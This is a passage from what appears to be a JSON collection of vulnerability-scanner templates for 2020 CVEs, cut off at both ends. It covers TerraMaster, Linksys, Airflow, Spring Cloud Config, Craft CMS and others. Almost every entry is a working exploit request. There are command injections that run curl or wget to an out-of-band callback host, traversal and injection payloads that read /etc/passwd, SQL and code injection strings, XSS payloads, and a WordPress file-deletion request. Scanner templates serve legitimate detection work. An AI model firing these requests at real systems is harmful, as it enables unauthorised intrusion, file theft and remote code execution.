{\"blobStoreName\": \"default\", \"strictContentTypeValidation\": \"true\"}, \"group\": {\"memberNames\": [\"$\\\\A{3*3333}\"]}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Member repository does not exist: A9999"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2020-28188","info":{"name":"TerraMaster TOS - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\nHost: {{Hostname}}\n","GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2020-5284","info":{"name":"Next.js <9.3.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/static/../server/pages-manifest.json"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["\\{\"/_app\":\".*?_app\\.js\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11450","info":{"name":"MicroStrategy Web 10.4 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/MicroStrategyWS/happyaxis.jsp"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Axis2 Happiness Page","Examining webapp configuration","Essential Components"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2036","info":{"name":"Palo Alto Networks PAN-OS Web Interface - Cross Site-Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E","{{BaseURL}}/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20285","info":{"name":"ZZcms - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /user/login.php HTTP/1.1\nHost: {{Hostname}}\nReferer: xss\"/><img src=\"#\" onerror=\"alert(document.domain)\"/>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["fromurl\" type=\"hidden\" value=\"xss\"/><img src=\"#\" onerror=\"alert(document.domain)\"/>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11110","info":{"name":"Grafana <= 6.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/snapshots HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nReferer: {{BaseURL}}\ncontent-type: application/json\nConnection: close\n\n{\"dashboard\":{\"annotations\":{\"list\":[{\"name\":\"Annotations & Alerts\",\"enable\":true,\"iconColor\":\"rgba(0, 211, 255, 1)\",\"type\":\"dashboard\",\"builtIn\":1,\"hide\":true}]},\"editable\":true,\"gnetId\":null,\"graphTooltip\":0,\"id\":null,\"links\":[],\"panels\":[],\"schemaVersion\":18,\"snapshot\":{\"originalUrl\":\"javascript:alert('Revers3c')\",\"timestamp\":\"2020-03-30T01:24:44.529Z\"},\"style\":\"dark\",\"tags\":[],\"templating\":{\"list\":[]},\"time\":{\"from\":null,\"to\":\"2020-03-30T01:24:53.549Z\",\"raw\":{\"from\":\"6h\",\"to\":\"now\"}},\"timepicker\":{\"refresh_intervals\":[\"5s\",\"10s\",\"30s\",\"1m\",\"5m\",\"15m\",\"30m\",\"1h\",\"2h\",\"1d\"],\"time_options\":[\"5m\",\"15m\",\"1h\",\"6h\",\"12h\",\"24h\",\"2d\",\"7d\",\"30d\"]},\"timezone\":\"\",\"title\":\"Dashboard\",\"uid\":null,\"version\":0},\"name\":\"Dashboard\",\"expires\":0}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"deleteKey\":","\"deleteUrl\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"url\":\"([a-z:/0-9A-Z]+)\""],"part":"body"}]}]},{"id":"CVE-2020-0618","info":{"name":"Microsoft SQL Server Reporting Services - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ReportServer/Pages/ReportViewer.aspx"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["view report"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17463","info":{"name":"Fuel CMS 1.4.7 - SQL Injection","severity":"high"},"requests":[{"raw":["GET /fuel/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /fuel/login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\n\nuser_name={{username}}&password={{password}}&Login=Login&forward=\n","@timeout: 10s\nGET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}\n"],"payloads":{"username":["admin"],"password":["admin"]},"attack":"pitchfork","cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_3 == 200","contains(body_1, \"FUEL CMS\")"],"condition":"and"}]}]},{"id":"CVE-2020-35489","info":{"name":"WordPress Contact Form 7 - Unrestricted File Upload","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 5.3.2')"]},{"type":"word","part":"body","words":["Contact Form 7","== Changelog =="],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"]}]}]},{"id":"CVE-2020-13167","info":{"name":"Netsweeper <=6.4.3 - Python Code Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%27{{url_encode(hex_encode(cmd))}}%27.decode%28%27hex%27%29%29%23&timeout=5","{{BaseURL}}/webadmin/out"],"headers":{"Referer":"{{BaseURL}}/webadmin/admin/service_manager_data.php"},"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{rand_str}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-1943","info":{"name":"Apache OFBiz <=16.11.07 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/control/stream?contentId=%27\\%22%3E%3Csvg/onload=alert(/xss/)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/xss/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35713","info":{"name":"Belkin Linksys RE6500 <1.0.012.001 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /goform/setSysAdm HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/login.shtml\n\nadmuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-11978","info":{"name":"Apache Airflow <=1.10.10 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /api/experimental/test HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"conf\": {\"message\": \"\\\"; touch test #\"}}\n","GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_4, \"operator\":\"BashOperator\")","contains(header_4, \"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"exec_date","group":1,"regex":["\"execution_date\":\"([0-9-A-Z:+]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-5777","info":{"name":"Magento Mass Importer  <0.7.24 - Remote Auth Bypass","severity":"critical"},"requests":[{"raw":["GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Too many connections"]},{"type":"status","status":[503]}]}]},{"id":"CVE-2020-15568","info":{"name":"TerraMaster TOS <.1.29 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3E{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /include/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5410","info":{"name":"Spring Cloud Config Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8497","info":{"name":"Artica Pandora FMS <=7.42 - Arbitrary File Read","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pandora_console/attachment/pandora_chat.log.json.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"type\"","\"id_user\"","\"user_name\"","\"text\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15920","info":{"name":"Mida eFramework <=2.9.0 - Remote Command Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14413","info":{"name":"NeDi 1.9C - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6171","info":{"name":"CLink Office 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13121","info":{"name":"Submitty <= 20.04.01 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /authentication/check_login?old=http%253A%252F%252Fexample.com%252Fhome HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/authentication/login\n\nuser_id={{username}}&password={{password}}&stay_logged_in=on&login=Login\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-8163","info":{"name":"Ruby on Rails <5.0.1 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-3187","info":{"name":"Cisco Adaptive Security Appliance Software/Cisco Firepower Threat Defense - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOE+/session_password.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["webvpn","Webvpn"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7980","info":{"name":"Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/libagent.cgi?type=J HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nCookie: ctr_t=0; sid=123456789\n\n{\"O_\": \"A\", \"F_\": \"EXEC_CMD\", \"S_\": 123456789, \"P1_\": {\"Q\": \"cat /etc/passwd\", \"F\": \"EXEC_CMD\"}, \"V_\": 1}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9054","info":{"name":"Zyxel NAS Firmware 5.21- Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9315","info":{"name":"Oracle iPlanet Web Server 7.0.x - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2","{{BaseURL}}/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4"],"matchers-condition":"and","matchers":[{"type":"word","words":["Admin Console"]},{"type":"word","words":["serverConfigurationsGeneral","serverCertificatesGeneral"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22840","info":{"name":"b2evolution CMS <6.11.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-11455","info":{"name":"LimeSurvey 4.1.11 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35847","info":{"name":"Agentejo Cockpit <0.11.2 - NoSQL Injection","severity":"critical"},"requests":[{"raw":["POST /auth/requestreset HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"user\": {\n    \"$func\": \"var_dump\"\n  }\n}\n","POST /auth/requestreset HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"user\": {\n    \"$func\": \"nonexistent_function\"\n  }\n}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_1","regex":["string\\([0-9]{1,3}\\)(\\s)?\"([A-Za-z0-9-.@\\s-]+)\""]},{"type":"regex","part":"body_1","negative":true,"regex":["string\\([0-9]{1,3}\\)(\\s)?\"(error404)([A-Za-z0-9-.@\\s-]+)\""]},{"type":"regex","part":"body_2","negative":true,"regex":["string\\([0-9]{1,3}\\)(\\s)?\"([A-Za-z0-9-.@\\s-]+)\""]}]}]},{"id":"CVE-2020-17362","info":{"name":"Nova Lite < 1.3.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["nova-lite"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13117","info":{"name":"Wavlink Multiple AP - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: http://{{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["parent.location.replace"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35951","info":{"name":"Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92\n\n\n------WebKitFormBoundaryBJ17hSJBjuGrnW92\nContent-Disposition: form-data; name=\"action\"\n\nqsm_remove_file_fd_question\n------WebKitFormBoundaryBJ17hSJBjuGrnW92\nContent-Disposition: form-data; name=\"file_url\"\n\n{{fullpath}}wp-content/plugins/quiz-master-next/README.md\n------WebKitFormBoundaryBJ17hSJBjuGrnW92--\n","GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')"]},{"type":"word","part":"body","words":["{\"type\":\"success\",\"message\":\"File removed successfully\"}"]}],"extractors":[{"type":"regex","name":"fullpath","group":1,"regex":["not found in <b>([/a-z_]+)wp"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-9036","info":{"name":"Jeedom <=4.0.38 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>document.title = \"\";alert(document.domain);\" - Jeedom\"</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19360","info":{"name":"FHEM 6.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24912","info":{"name":"QCube Cross-Site-Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/assets/_core/php/profile.php","{{BaseURL}}/assets/php/profile.php","{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php"],"body":"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('xss')</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]}]}]},{"id":"CVE-2020-5191","info":{"name":"PHPGurukul Hospital Management System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /hospital/hms/admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&submit=&submit=\n","POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndoctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<td class=\"hidden-xs\"></td><script>alert(document.domain);</script><td>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5192","info":{"name":"Hospital Management System 4.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /hospital/hms/doctor/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}password={{password}}&submit=&submit=\n","POST /hospital/hms/doctor/search.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17518","info":{"name":"Apache Flink 1.5.1 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /jars/upload HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y\n\n------WebKitFormBoundaryoZ8meKnrrso89R6Y\nContent-Disposition: form-data; name=\"jarfile\"; filename=\"../../../../../../../tmp/poc\"\n\n{{randstr}}\n------WebKitFormBoundaryoZ8meKnrrso89R6Y--\n","GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"{{randstr}}\") && status_code == 200"]}]}]},{"id":"CVE-2020-26413","info":{"name":"Gitlab CE/EE 13.4 - 13.6.2 - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"query\": \"{\\nusers {\\nedges {\\n  node {\\n    username\\n    email\\n    avatarUrl\\n    status {\\n      emoji\\n      message\\n      messageHtml\\n     }\\n    }\\n   }\\n  }\\n }\",\n  \"variables\": null,\n  \"operationName\": null\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"avatarUrl\":","\"node\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".data.users.edges[].node.email"],"part":"body"}]}]},{"id":"CVE-2020-18268","info":{"name":"Z-Blog <=1.5.2 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /zb_system/cmd.php?act=verify HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 81\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nbtnPost=Log+In&username={{username}}&password={{md5(\"{{password}}\")}}&savedate=0\n","GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-5405","info":{"name":"Spring Cloud Config - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24223","info":{"name":"Mara CMS  7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19295","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","JEESNS"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8641","info":{"name":"Lotus Core CMS 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9402","info":{"name":"Django SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1"],"matchers":[{"type":"word","words":["DatabaseError at","ORA-29257:","ORA-06512:","Request Method:"],"condition":"and"}]}]},{"id":"CVE-2020-36289","info":{"name":"Jira Server and Data Center - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin","{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["rel=\\\"admin\\\""]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9757","info":{"name":"Craft CMS < 3.3.0 - Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}","{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["MetaLinkContainer","canonical","22344"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35729","info":{"name":"Klog Server <=2.41 - Unauthenticated Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/actions/authenticate.php"],"body":"user={{dummy}}%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd={{dummy}}","matchers":[{"type":"word","words":["poc-testing"]}]}]},{"id":"CVE-2020-14864","info":{"name":"Oracle Fusion - Directory Traversal/Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1","{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13158","info":{"name":"Artica Proxy Community Edition <4.30.000000 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27467","info":{"name":"Processwire CMS <2.7.1 - Local File 